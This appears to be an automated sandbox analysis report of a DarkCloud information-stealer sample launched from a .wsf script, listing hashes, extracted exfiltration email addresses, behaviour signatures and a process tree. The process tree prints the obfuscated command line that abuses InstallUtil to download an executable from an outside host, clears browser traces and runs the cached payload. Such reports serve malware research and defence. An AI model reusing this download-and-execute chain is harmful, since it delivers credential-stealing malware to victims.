Analysis

  • max time kernel
    145s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-05-2024 11:33

General

  • Target

    SOA_XSL.wsf

  • Size

    795B

  • MD5

    644ca3a3f10afbeab56d93ce4ad7f0ba

  • SHA1

    ef5dcb8a6e1a1152d116411f784a609c8f870a0a

  • SHA256

    377180ae7109057e5f8403307834211a4c75a584be3090552cb059e52bf4a192

  • SHA512

    da09d35e3dabf0f4c4d541b0322ca1e2600522d7d41abc6adf04d568a58af8a98e89bbcd83a67869e1becaf6fda412aaf0762f1465e47faceaf06293d1db27ea

Score
10/10

Malware Config

Extracted

Family

darkcloud

Attributes
  • email_from

    igor.bos@vinoterra.ru

  • email_to

    office.tony39@mail.ru

Signatures

  • DarkCloud

    An information stealer written in Visual Basic.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 16 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOA_XSL.wsf"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C DeVIceCREDeNTIalDeploymeNt.eXe & RUNdLl32 inEtCPL.cpL , ClearMyTracksByProcess 8 && C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\inStallUtIL https://bshd1.shop/ljeCUBbq/file532024.exe && tiMeoUT /t 7 /NOBrEak > nuL & fOR /f %A in ( ' dIR C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\ /S /b ' ) Do cONHosT %A"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:768
      • C:\Windows\system32\DeviceCredentialDeployment.exe
        DeVIceCREDeNTIalDeploymeNt.eXe
        3⤵
          PID:1268
        • C:\Windows\system32\rundll32.exe
          RUNdLl32 inEtCPL.cpL , ClearMyTracksByProcess 8
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3336
          • C:\Windows\system32\rundll32.exe
            C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000
            4⤵
            • Modifies registry class
            PID:628
        • C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\InstallUtil.exe
          C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\inStallUtIL https://bshd1.shop/ljeCUBbq/file532024.exe
          3⤵
          • Loads dropped DLL
          PID:1484
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c dIR C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\ /S /b
          3⤵
            PID:2332
          • C:\Windows\system32\conhost.exe
            cONHosT C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1952
            • C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
              C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4444
              • C:\Windows\SysWOW64\svchost.exe
                C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
                5⤵
                • Suspicious use of SetWindowsHookEx
                PID:2940

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6WJSJ70T\file532024[1].exe
        Filesize

        1.3MB

        MD5

        99332016403c66ac129b2ab34e97b0ed

        SHA1

        37c0df4ea5fa74972be7619094081dc726cbf665

        SHA256

        3116fd6a924c1f827b67fbf721d6be3ba1ac8a71da15a6dff5548cfce2231650

        SHA512

        351e06565a3e2f8e227dc8f404c5e368553643540f0f9349d780e0973f89be95b1cb286498b42c2851bdc2094032554268d50b0f165548704ef6ecacbb5da00e

      • memory/1484-0-0x0000000000510000-0x000000000051C000-memory.dmp
        Filesize

        48KB

      • memory/1484-1-0x0000000000F30000-0x0000000000F4A000-memory.dmp
        Filesize

        104KB

      • memory/2940-28-0x0000000000400000-0x0000000000460000-memory.dmp
        Filesize

        384KB

      • memory/2940-29-0x0000000000400000-0x0000000000460000-memory.dmp
        Filesize

        384KB